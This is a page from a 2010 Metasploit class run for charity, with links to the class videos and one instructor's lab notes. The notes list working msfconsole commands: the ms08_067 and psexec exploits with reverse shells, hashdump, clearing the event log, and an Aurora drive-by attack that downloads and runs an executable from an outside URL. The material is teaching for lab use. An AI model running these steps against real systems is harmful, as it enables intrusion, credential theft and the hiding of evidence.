Metasploit Class Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Metasploit Class Videos On May 8th 2010 the Kentuckiana ISSA held a 7 hour Metasploit class at the Brown hotel in Louisville Ky. Proceeds from the class went to the Hackers For Charity Food for Work program. The instructors were David "ReL1K" Kennedy, Martin "PureHate" Bos, Elliott "Nullthreat" Cutright, Pwrcycle and Adrian "Irongeek" Crenshaw. Below are the videos of the event. I hope you enjoy them, and if you do please consider donating to Johnny Longs' organization. This should be more Metasploit than you can stand! Note: For best viewing download the AVIs, the streaming versions are not as high quality. 1 Metasploit Intro - Irongeek

Download video:

http://www.archive.org/download/LouisvilleMetasploitClass/1MetasploitIntro-Irongeek.avi Slides can be found at:

http://www.irongeek.com/downloads/metasploit-intro.pdf



2 Metasploit Scanning and Pivoting - Pwrcycle

Download video:

http://www.archive.org/download/LouisvilleMetasploitClass/2MetasploitScanningAndPivoting-Pwrcycle.avi Slides can be found at:

http://cafecode.com/metasploit/



3 Metasploit Fuzzing and Exploit Development - Nullthreat



Download video:

http://www.archive.org/download/LouisvilleMetasploitClass/3MetasploitFuzzingAndExploitDevelopment-Nullthreat.avi Slides can be found at:

http://www.nullthreat.net



4 Meterpreter and Post Exploitation (and a demo of Metasploit Express) - Purehate



Download video:

http://www.archive.org/download/LouisvilleMetasploitClass/4MeterpreterAndPostExploitation-Purehate.avi Slides can be found at:

http://bit.ly/d8QZwR



5 Social Engineering Toolkit - ReL1K Download video:

http://www.archive.org/download/LouisvilleMetasploitClass/5SocialEngineeringToolkit-Rel1k.avi



6 More Encoding Fun, Fasttrack and Closing - ReL1K



Download video:

http://www.archive.org/download/LouisvilleMetasploitClass/6MoreEncodingFasttrackAndClosing-Rel1k.avi Slides can be found at:

http://www.secmaniac.com (whenever Dave puts them out there :) )

Websites of the groups and people involved in setting up the class: http://www.hackersforcharity.org

http://www.metasploit.com

http://www.issa-kentuckiana.org

http://www.offensive-security.com

http://www.secmaniac.com

http://tools.question-defense.com

http://www.nullthreat.net

http://indysec.blogspot.com/

http://irongeek.com What follows are the class notes for Adrian's section:

Metasploit Intro: Class Notes

This sheet is meant to be a convenient set of notes for the exercises Adrian will be demonstrating in class. These are the commands used in the demos for your reference, along with why they were used. Items in blue are things you type, green are things you click, gray is something optional that you may want to play with latter and red is just to grab your attention. --------------------------------------------------------

Exercise 0: Getting into BackTrack 4

--------------------------------------------------------

Login with " root " as the user name and " toor " as the password. So we can more easily get around, we will also start up X windows: startx Then, since the network starts off as disabled (a good idea so as not to announce yourself on the network till you are ready) let's bring it up and note our IP: /etc/init.d/networking start ifconfig

--------------------------------------------------------

Exercise 0.5: Login to XP

--------------------------------------------------------

Log in with " IndySploit " as the user name and " password " as the password. Then note our IP (Students will not need to do this step unless they brought their own XP VM): ipconfig

--------------------------------------------------------

Exercise 1: A few simple commands for Metasploit in BT4

--------------------------------------------------------

I plan to point these commands out, but not run them to completion.



Grab the latest Metasploit Modules: msfupdate

If you want to script some stuff later, look into: msfcli | less

There is also the GUI, but we will not be using it in class: msfgui

--------------------------------------------------------

Exercise 2: Let's Demo Metasploit MSFWeb interface in BT4

--------------------------------------------------------



To start off easy let�s use the web interface. It is not as well supported as msfconsole, but it�s prettier to show management the easy of exploitation (the ampersand is there so we can keep typing commands at the shell): msfweb&

Now let's start FireFox and go to: http://127.0.0.1:55555

You will most likely have to disable NoScript to het the web interface to work correctly.



Now that we have the web interface up, let's look for a module to use. Click "Exploit", and on the search bar enter: psexec On the list that comes up, choose " Microsoft Windows Authenticated User Code Execution ", " Automatic " and for payload choose " windows/vncinject/reverse_tcp "



For the RHOST enter the IP of the XP box. SMB Password and SMB User are " password " and " IndySploit " respectively. For LHOST enter the BT4 box's IP. Not clicking the " Launch Exploit " button should be all we need to do to get a lovely VNC session.



--------------------------------------------------------

Exercise 3: Let's use MSFConsole under BT4

--------------------------------------------------------

Fire up the MSFConsole: msfconsole

Now note that you can type normal *nix commands for inside of MSFConsole: ifconfig

When in doubt, scream and shout: help

Also note, tab completion works.



Now in MSFWeb we did not use a real vulnerability (psexec really is a feature), so let�s try an exploit this time. First let�s find an exploit: search netapi



Ok, we found one I want to use, let's find out more about it: info windows/smb/ms08_067_netapi

Sounds good, let's use it: use exploit/windows/smb/ms08_067_netapi

Now we need to set some options. We can use "set" to just set them this one time, or use "setg" so they stick around if we switch to another module. Use "back", "unset" or "unsetg" if you screw up and have a typo. Let select a payload to use: setg payload windows/meterpreter/reverse_tcp

We could also set an encoder to use, but this is optional: set encoder x86/shikata_ga_nai

Ok, what options do we need to set? show options Anything else cool we can do to customize the pwnage? show advanced Ok, let�s set some required options that don�t already have defaults, fill in the items in brackets accordingly: setg rhost <XP box's IP>

setg lhost <BT4 box's IP> Now let�s tell Metasploit to fire off the exploit, and see if things work: exploit

If that worked, we should have a Meterpreter session. Martin will talk more on Meterpreter later, but here are a few Commands to try:

<We are now in Meterpreter>

Get some help: help

Let�s get some info about the system: sysinfo

Get a command prompt on the exploited box: shell

exit Get back to the MSFConsole prompt: background

<We are now out of Meterpreter>

Ok, what sessions are there?

help sessions

sessions Ok, let's get back into our Meterpreter session: sessions -i 1 <We are now in Meterpreter>

We will try to run a command on the remote box, and see it in the process list: execute -f notepad.exe

ps

Grab some hashes: hashdump Clear the event log: clearev

Run a Meterpreter script: run scraper

A bunch of nifty stuff should now be in /root/.msf3/logs/scraper/

If you have updated to the latest version, this is a also a fun command: screenshot

--------------------------------------------------------

Exercise 4: Extra credit, start a server on your box and do a drive by browser exploit

--------------------------------------------------------

( You will need to have an Internet connection, used msfupdate to get the latest modules, and have a webcam hooked up to the exploited box. Or you could just modify these commands to work for your circumstances. )



Under BT4 VM : msfconsole

use exploit/windows/browser/ms10_002_aurora

set uripath pwnme

set payload windows/download_exec

set url http://irongeek.com/temp/camserver.exe

exploit

On the XP box, web surf to: http://<ip of BT4 box>:8080/pwnme Under BT4, web surf to: http://<ip of XP box>

Useful Links: http://www.offensive-security.com/metasploit-unleashed/

http://www.irongeek.com/

http://www.secmaniac.com/

http://tools.question-defense.com

http://www.room362.com/

http://www.darkoperator.com/meterpreter/

http://www.isd-podcast.com/





Printable version of this article